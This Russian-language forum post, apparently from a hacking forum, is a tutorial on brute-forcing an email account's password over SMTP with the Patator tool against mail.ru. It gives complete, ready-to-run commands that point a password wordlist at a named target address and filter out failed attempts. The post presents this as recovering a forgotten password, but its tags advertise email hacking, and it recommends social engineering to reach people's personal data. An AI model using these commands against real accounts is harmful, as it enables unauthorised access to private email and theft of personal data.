Перейти к содержимому



Фотография
  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 roguevad

roguevad

    Эксперт.

  • Пользователи
  • PipPipPipPipPip
  • 350 сообщений

Отправлено 11 Май 2021 - 12:52

Приветствую, хакеры, в данной статье расскажу об одном способе брута с помощью программы Patator

Первый этап

Для начала нам нужно склонить саму программу.

Код:

   git clone https://github.com/l...lot/patator.git

   cd patator

   chmod +x ./patator.py

Второй этап

Давайте теперь попробуем запустить программу 

   ./patator.py
 

В нашем "меню" мы можем как раз таки ознакомиться о всех возможных векторах атаки, которые предоставляет нам patator.

Третий этап

Теперь давайте займемся разбором нашей задачи , на нужно реализовать smtp_login.


Давайте попробуем ввести команду:
   ./patator.py smtp_login

 

Ага. Теперь мы можем наблюдать еще одно меню, которое позволяет нам настроить непосредственно саму атаку так, как мы хотим.

В принципе, я думаю, что переводить флаги - нет смысла, можно догадаться, что к чему.

Итак, теперь приступим к самому бруту.
Сразу готов сказать, что синтаксис не привычный.
Теперь добавляем дополнительные параметры к условию задачи:
email - anonqwer@bk.ru

Наконец-то!
Давайте скорее приступим к восстановлению доступа к почте

Код:

   ./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1       user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt

И что мы видим?!
Заветное "Authentication succeeded" !
Ура, мы вспомнили пароль 


А теперь по порядку:

 

host - smtp сервер, где зарегистрирована наша почта (в моем случае - это маил)

port - порт, к которому надо коннектить (Капитан очевидность, здравствуйте)

ssl - принимает на вход 0 или 1, в нашем случае мы обязаны использовать ssl

user - наш таргет

password - принимает словарь, но не путем до файла, а константой FILEn, где n - цифра, в которую мы запишем наш путь до словаря

Четвертый этап

Приводим наш вывод в оптимальный вид, а не как в этих ваших матрицах x)


Patator позволяет нам игнорировать вывод определенных ошибок с помощью дополнительного флага.
В нашем случае - у нас на некорректные пароли всегда вылетает ошибка "Authentication failed. Please verify your account by going to https://e.mail.ru/lo...=anonqwer@bk.ru"
Предлагаю убрать вывод паролей с такой ошибкой

Код:

   ./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1    user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt -x   ignore:fgrep='Authentication failed. Please verify your account by going  to https://e.mail.ru/lo...anonqwer@bk.ru'

 

Ура! Теперь лишняя информация (хотя она не всегда лишняя) не мусолит нам глаза
 

Заключение

Вот таким не хитрым способом мы смогли получить доступ к нашей забытой почте.
Не для кого не секрет, что брут почт уже устарел и чтобы пробрутить @gmail.com или @yandex.ru придется подумать несколько раз, чтобы запустить брут. Лучший вектор для получения доступа к личным данным человека - социальная инженерия.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 





Темы с аналогичным тегами взлом, взломщик, хакер, хакинг, программа для взлома, patator, брут, брут почты, взлом почты, как взломать почту, программа для взлома почты, брутфорс почты


Яндекс.Метрика Top.Mail.Ru Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal